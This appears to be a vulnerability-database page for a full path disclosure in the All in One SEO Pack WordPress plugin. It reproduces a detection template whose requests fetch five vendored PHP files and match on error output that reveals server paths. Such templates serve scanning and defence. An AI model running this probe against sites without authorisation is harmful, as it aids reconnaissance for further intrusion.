wp-all-in-one-seo-pack-fpd: WordPress All in One SEO Pack - Full Path Disclosure

2026-01-08 WordPress All in One SEO Pack PoC Public

Description

All in One SEO Pack for WordPress contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.

PoC

id: wp-all-in-one-seo-pack-fpd

info:
  name: WordPress All in One SEO Pack - Full Path Disclosure
  author: theamanrawat,DhiyaneshDk
  severity: low
  description: |
    All in One SEO Pack for WordPress contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
  impact: |
    Attackers can obtain server file paths, aiding in further exploitation of the website.
  reference:
    - https://wordpress.org/plugins/all-in-one-seo-pack/
  metadata:
    verified: true
    max-requests: 1
    public-www: "/wp-content/plugins/all-in-one-seo-pack/"
  tags: debug,wordpress,wp,wp-plugin,all-in-one-seo-pack,fpd,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/ActionScheduler_AdminView.php"
      - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/ActionScheduler_ListTable.php"
      - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_QueueRunner.php"
      - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Store.php"
      - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "all-in-one-seo-pack")'
        condition: and
# digest: 490a004630440220033f57ef8463f9353d24a1237e84c202e55ea2a9a46e414bfd7e76b038dbef55022026c43769ca77402bafb5ea093939661ff752eb59111906d2559de34cb27c9e3b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities